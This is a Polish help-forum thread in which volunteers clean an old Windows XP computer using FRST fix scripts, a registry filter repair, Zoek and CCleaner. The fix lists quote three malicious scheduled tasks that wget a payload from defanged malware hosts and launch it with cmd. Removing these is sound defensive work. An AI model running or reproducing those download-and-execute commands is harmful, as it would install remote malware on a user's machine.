Palovnik Opublikowano 4 Września 2016 Zgłoś Udostępnij Opublikowano 4 Września 2016 Witam. Tak jak w temacie. Windows praktycznie czysty. Wirusy w rejestrze, w Windows, stare pliki w rejestrze z programów dawno usuniętych, w tym ze starego antywirusa usuniętego dawno przez deinstalatora, pulpit ucieka od active desktop, zainfekowany pendrive, niemożność usunięcia programów apple, niemożność użycia panda vaccine, mbam i krsv nic nie wykrywają, było tak jakby kilku użytkowników na tym komputerze, gmer debuguje w trakcie, gdzieś w dokumentach wszystkich użytkowników w folderze microsoft było coś podpisane jako crypto.. FRST.txtPobieranie informacji ... Addition.txtPobieranie informacji ... Shortcut.txtPobieranie informacji ... Odnośnik do komentarza
Palovnik Opublikowano 4 Września 2016 Autor Zgłoś Udostępnij Opublikowano 4 Września 2016 Przepraszam, nie wiem jak zedytować żeby dodać wcześniejsze pliki .txt. AdwCleanerS0.txtPobieranie informacji ... Addition stare.txtPobieranie informacji ... legal_notices.txtPobieranie informacji ... Odnośnik do komentarza
jessica Opublikowano 4 Września 2016 Zgłoś Udostępnij Opublikowano 4 Września 2016 Nic tu nie wskazuje na istnienie ZeroAcces, ani żadnej innej infekcji. Tylko kosmetyka: twórz Notatnik i wklej w nim: CustomCLSID: HKU\S-1-5-21-839522115-1303643608-1417001333-1003_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\DOCUME~1\Dawid\Pulpit\BESTPL~1.EXE => Brak pliku Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\58053762.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\58053762.sys => ""="Driver" HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k HKLM\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe,C:\Program Files\G DATA\TotalProtection\AVKTray\AVKTray.exe,C:\Program Files\G DATA\TotalProtection\AVKKid\AVKCKS.exe, ProxyServer: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80 AutoConfigURL: [S-1-5-21-839522115-1303643608-1417001333-1003] => http=222.66.115.233:80 BHO: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~1\ALLPLA~1\Iplex\IPLEXT~1.DLL => Brak pliku DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab S3 MozillaMaintenance; "C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe" [X] S3 WMPNetworkSvc; "C:\Program Files\Windows Media Player\wmpnetwk.exe" [X] R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG) C:\WINDOWS\system32\drivers\GDKBFlt32.sys S3 CrystalSysInfo; \??\C:\Program Files\MediaCoder\SysInfo.sys [X] S4 hpt3xx; Brak ImagePath S4 IntelIde; Brak ImagePath S3 LgBttPort; system32\DRIVERS\lgbtport.sys [X] S3 lgbusenum; system32\DRIVERS\lgbtbus.sys [X] S3 LGVMODEM; system32\DRIVERS\lgvmodem.sys [X] S3 Passthru; system32\DRIVERS\PPFlt.sys [X] S3 usbbus; system32\DRIVERS\lgusbbus.sys [X] S3 UsbDiag; system32\DRIVERS\lgusbdiag.sys [X] S3 USBModem; system32\DRIVERS\lgusbmodem.sys [X] C:\WINDOWS\Minidump\Mini*.dmp HOSTS: EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). jessi Odnośnik do komentarza
Palovnik Opublikowano 4 Września 2016 Autor Zgłoś Udostępnij Opublikowano 4 Września 2016 Po:PusTy:Wpis:klaWiaTuRy Odnośnik do komentarza
jessica Opublikowano 4 Września 2016 Zgłoś Udostępnij Opublikowano 4 Września 2016 W dniu 4.09.2016 o 15:42, Palovnik napisał(a): Po:PusTy:Wpis:klaWiaTuRy Rozwiń co to jest? Odnośnik do komentarza
Palovnik Opublikowano 17 Września 2016 Autor Zgłoś Udostępnij Opublikowano 17 Września 2016 witam ponownie, mam w koncu dostep. otoz chodzilo mi o to ze po wykonaniu tego skryptu nie dziala mi klawiatura, tj. tak jakby sie spalila, swiecila sie lampka caps locka i zero reakcji. to byla stara klawiatura na ps2. pozyczylem od kolegi klawiature z wejsciem usb, w ogole jej nie wykrywalo ze jest podlaczona (pendrive dziala). nowa klawiatura na ps2 ma to samo, swieci sie lampka kontrolna caps locka i tyle. sprawdzalem i pisze ze nie ma sterownika, a system nie potrafi go automatycznie wykryc. Odnośnik do komentarza
picasso Opublikowano 17 Września 2016 Zgłoś Udostępnij Opublikowano 17 Września 2016 Skoryguję co zostało tu powiedziane. Infekcja tu była, załączono ją w skrypcie "kosmetycznym": Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp Ale to nie ZeroAccess, który jest martwy od lat. Cytat Wirusy w rejestrze, w Windows, stare pliki w rejestrze z programów dawno usuniętych, w tym ze starego antywirusa usuniętego dawno przez deinstalatora, pulpit ucieka od active desktop, zainfekowany pendrive, niemożność usunięcia programów apple, niemożność użycia panda vaccine, mbam i krsv nic nie wykrywają, było tak jakby kilku użytkowników na tym komputerze, gmer debuguje w trakcie, gdzieś w dokumentach wszystkich użytkowników w folderze microsoft było coś podpisane jako crypto.. Rozwiń - Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"? - Na czym polega niemożność deinstalacji programu "Apple Software Update"? - Tak, w komputerze jest kilku użytkowników i jest to normalny układ. Wszystkie konta z wyjątkiem osobiście przez Ciebie założonego (Dawid) oraz wprowadzonego przez instalację .NET Framework 1.1 (ASPNET) są wbudowane w każdy system XP. To od .NET można usunąć, jest zbędne. ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-839522115-1303643608-1417001333-500 - Administrator - Enabled) ASPNET (S-1-5-21-839522115-1303643608-1417001333-1004 - Limited - Enabled) Dawid (S-1-5-21-839522115-1303643608-1417001333-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Dawid Gość (S-1-5-21-839522115-1303643608-1417001333-501 - Limited - Disabled) Pomocnik (S-1-5-21-839522115-1303643608-1417001333-1000 - Limited - Enabled) SUPPORT_388945a0 (S-1-5-21-839522115-1303643608-1417001333-1002 - Limited - Disabled) - A foldery "crypto" są poprawne i nie próbuj ich usuwać, bo uszkodzisz system certyfikatów systemu: C:\Documents and Settings\[Folder konta]\Dane aplikacji\Microsoft\Crypto Cytat otoz chodzilo mi o to ze po wykonaniu tego skryptu nie dziala mi klawiatura Rozwiń Tak, bo jessika przetworzyła w skrypcie sterownik G Data filtrujący klawiaturę, ale nie zdejmując filtra z klawiatury (to należało zrobić przed próbą usuwania sterownika). KBFlt = Keyboard Filter: R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG) Otwórz Notatnik i wklej w nim: Reg: reg add HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318} /v UpperFilters /t REG_MULTI_SZ /d kbdclass /f CMD: net user ASPNET /delete S3 IDriverT; "C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe" [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKLM -> DefaultScope - brak wartości FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: (Microsoft .NET Framework Assistant) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2011-06-28] [Brak podpisu cyfrowego] Reboot: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw plik. A klawiatura powinna zacząć działać. Odnośnik do komentarza
Palovnik Opublikowano 18 Września 2016 Autor Zgłoś Udostępnij Opublikowano 18 Września 2016 1. Rejestr -widziałem wpisy dawno usuniętych programów i aplikacji. Jakoś drażni to moje oczy jest jakieś narzędzie które potrafi sobie z tym poradzić? 2. Apple Software Update - przy próbie usunięcia przez panel sterowania pojawia się komunikat: wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić programu wymaganego do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. (--> klikam w ok) i następnie: błąd krytyczny podczas instalacji. 3. Skrypt wykonany, log w załączniku. Ale nasuwa mi się pytanie: G Data zainstalowałem baaardzo dawno temu, nie spełniało norm dla tego mojego komputerowego dziadka, więc chciałem usunąć. Zwyczajnie przez panel sterowania i menu start się nie dało, usunąłem więc przez program do usuwania G Data. A jak się później okazało wciąż miałem G Data w systemie, aktywne ikony, program jakby działał w tle, choć nie działał już jako antywirus. Teraz się okazuje że wciąż "chronił?" klawiaturę. Czy to normalne? Fixlog.txtPobieranie informacji ... Odnośnik do komentarza
picasso Opublikowano 20 Września 2016 Zgłoś Udostępnij Opublikowano 20 Września 2016 Nie odpowiedziałweś mi na pytanie: picasso napisał(a): Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"? Rozwiń Cytat Rejestr -widziałem wpisy dawno usuniętych programów i aplikacji. Jakoś drażni to moje oczy jest jakieś narzędzie które potrafi sobie z tym poradzić? Rozwiń Pokaż o które wpisy chodzi. Jeśli rzecz o automatach czyszczących rejestr, nieszczególnie polecam. Można sobie nagrabić. Cytat G Data zainstalowałem baaardzo dawno temu, nie spełniało norm dla tego mojego komputerowego dziadka, więc chciałem usunąć. Zwyczajnie przez panel sterowania i menu start się nie dało, usunąłem więc przez program do usuwania G Data. A jak się później okazało wciąż miałem G Data w systemie, aktywne ikony, program jakby działał w tle, choć nie działał już jako antywirus. Teraz się okazuje że wciąż "chronił?" klawiaturę. Czy to normalne? Rozwiń Zdarza się, że są problemy z deinstalacją tego typu programów. A sterowniki filtrujące urządzenia mogą pozostać nawet po deinstalacji. Od czasu do czasu to widzę np. przy Avast czy Kasperskym. Cytat Apple Software Update - przy próbie usunięcia przez panel sterowania pojawia się komunikat: wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić programu wymaganego do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. (--> klikam w ok) i następnie: błąd krytyczny podczas instalacji. Rozwiń Uruchom Zoek. W oknie wklej: Apple Software Update;u Klik w Run Script. Przedstaw wynikowy log zoek-results.txt (po zmianie nazwy z *.log). Odnośnik do komentarza
Palovnik Opublikowano 22 Września 2016 Autor Zgłoś Udostępnij Opublikowano 22 Września 2016 1. Jeśli chodzi o wirusy w rejestrze.. hmm. jeszcze zanim założyłem tutaj temat skanowałem system kilkoma programami antywirusowymi, kilkukrotnie, jeden z nich (nie pamiętam który) wykrył 2 zagrożenia, które usunąłem (razem niestety z raportem). Przeglądając rejestr znalazłem jeden wpis zaczynający się od Micorsoft, uznałem to za wpis wirusa, nie jestem teraz w stanie go odnaleźć. 2. Jeśli chodzi o pendrive.. Byłem w szpitalu 10 dni i po powrocie miałem wrażenie że komputer strasznie wolno chodzi, a zwłaszcza przeglądając zawartość pendrive - komputer dostawał strasznej zwiechy. Uznałem wtedy pendrive w przypływie złości i z braku wiedzy jako współwinnego, nie skanowałem jego zawartości, ale też nie jestem w stanie empirycznie potwierdzić że "coś" w sobie ma. 3. Jak już wspomniałem, moja wiedza jest podstawowa, ale z tego co rzuca mi się w oczy.. H_Key_Classes_Root: w.sz-->wtwExtension, AllPlayerFile, masa folderów z Best Player, gg, java plugin i javascript, wtw; H_Key_Local_Machine -- > Software: Adobe, Adw Cleaner, Apple Inc. (w tym oprócz tegoż software update również Quick Time), Brother, Eset, Javasoft, Kaspersky Lab, LG Electronics, Malwarebytes, OldTimer Tools, Panda Software... To tak z moją wiedzą i na szybko.. Czyli programy takie jak kiedyś używałem czyli CC Cleaner i Ntreg (coś takiego) Optimizer są niewskazane? 4. Dołączam skrypt. zoek-results.txtPobieranie informacji ... Odnośnik do komentarza
picasso Opublikowano 2 Października 2016 Zgłoś Udostępnij Opublikowano 2 Października 2016 Zoek wykonał zadanie i nie powinieneś już widzieć "Apple Software Update" na liście zainstalowanych. Cytat 2. Jeśli chodzi o pendrive.. Byłem w szpitalu 10 dni i po powrocie miałem wrażenie że komputer strasznie wolno chodzi, a zwłaszcza przeglądając zawartość pendrive - komputer dostawał strasznej zwiechy. Uznałem wtedy pendrive w przypływie złości i z braku wiedzy jako współwinnego, nie skanowałem jego zawartości, ale też nie jestem w stanie empirycznie potwierdzić że "coś" w sobie ma. Rozwiń Na wszelki wypadek możesz zrobić log USBFix z opcji Listing przy podpiętym pendrive. Cytat 3. Jak już wspomniałem, moja wiedza jest podstawowa, ale z tego co rzuca mi się w oczy.. Rozwiń Te które znalazłeś i jesteś pewien, że to szczątki możesz oczywiście usunąć. Mógłbyś też uruchomić wersję CCleaner Portable, zrobić skan na wyszukiwanie śmieci w rejestrze i dostarczyć log do oceny. Cytat Czyli programy takie jak kiedyś używałem czyli CC Cleaner i Ntreg (coś takiego) Optimizer są niewskazane? Rozwiń Czyszczenie rejestru w rozumieniu automatycznego wyszukiwania wpisów odpadkowych jest ryzykowne. Automat nigdy nie uzyska percepcji żywego człowieka i mogą zostać usunięte wpisy które nie powinny być. Tu na forum były rozmaite przeboje, użytkownicy wyczyścili rejestr "za bardzo" i pojawiły się liczne problemy w systemie, które trzeba było odkręcać np. Przywracaniem systemu. Natomiast kompaktowanie rejestru za pomocą NTREGOPT, czy usuwanie plików tymczasowych w CCleaner pożądane. Odnośnik do komentarza
Palovnik Opublikowano 2 Października 2016 Autor Zgłoś Udostępnij Opublikowano 2 Października 2016 1. Nie ma tego wpisu w panelu sterowania. 2. USBFix wydaje się ok. Tylko nie wiem czemu pokazuje włączone Windows Update skoro jest wyłączone. 3. Skan zrobiony zwykłym CCCleaner, przekierowuje mnie z wersji portable do zwykłej, dołączam log. UsbFix_Report.txtPobieranie informacji ... cccleaner rejestr.txtPobieranie informacji ... Odnośnik do komentarza
picasso Opublikowano 7 Października 2016 Zgłoś Udostępnij Opublikowano 7 Października 2016 Cytat 2. USBFix wydaje się ok. Tylko nie wiem czemu pokazuje włączone Windows Update skoro jest wyłączone. Rozwiń Raport USBFix nie wykazuje, by w root pendrive była jakaś infekcja. Cytat 3. Skan zrobiony zwykłym CCCleaner, przekierowuje mnie z wersji portable do zwykłej, dołączam log. Rozwiń Czy masz na myśli, że pobiera się plik ccsetup522.zip? To jest wersja portable. Wyniki z CCleaner przejrzałam na szybko. Na pierwszy rzut oka większość zdaje się być do wyrzucenia. Zastanowiły mnie jednak pewne wpisy relatywne do instalacji Microsoftu, powiązane z figurującymi na liście zainstalowanych łatami IE8, IE8 jako takim, MSXML, .NET Framework. Czy Ty aby nie usuwałeś z dysku wcześniej na siłę jakiś elementów Microsoftu? Odnośnik do komentarza
Palovnik Opublikowano 7 Października 2016 Autor Zgłoś Udostępnij Opublikowano 7 Października 2016 Hm, no usuwałem. Chciałem na siłę pousuwać co się da bo praktycznie używam 3-4 aplikacje a w ciągu kilku miesięcy planuję wymianę sprzętu, no i tak wyszło. Odnośnik do komentarza
picasso Opublikowano 8 Października 2016 Zgłoś Udostępnij Opublikowano 8 Października 2016 No cóż, w tej sytuacji założę, że wyniki CCleaner odpowiadają stanowi faktycznemu i to są po prostu skutki zbyt intensywnego "czyszczenia dysku". Przed usuwaniem w CCleaner rzecz jasna zrób kopię zapasową usuwanych wpisów, usuń wszystkie wyniki, zesetuj system i poprzyglądaj się czy są jakieś jawne skutki uboczne. Odnośnik do komentarza
Palovnik Opublikowano 18 Października 2016 Autor Zgłoś Udostępnij Opublikowano 18 Października 2016 No więc trochę minęło, już z tydzień po czyszczeniu rejestru, wszystko działa jak należy. Myślę że to wszystko, tylko jeszcze posłużę się tematem z ostatnimi krokami po dezynfekcji, dziękuję serdecznie za pomoc. Odnośnik do komentarza
picasso Opublikowano 21 Października 2016 Zgłoś Udostępnij Opublikowano 21 Października 2016 Tak, tu tylko zostało zastosowanie DelFix i czyszczenie folderów Przywracania systemu, które są opisane w przyklejonym. Temat rozwiązany. Zamykam. Odnośnik do komentarza
Rekomendowane odpowiedzi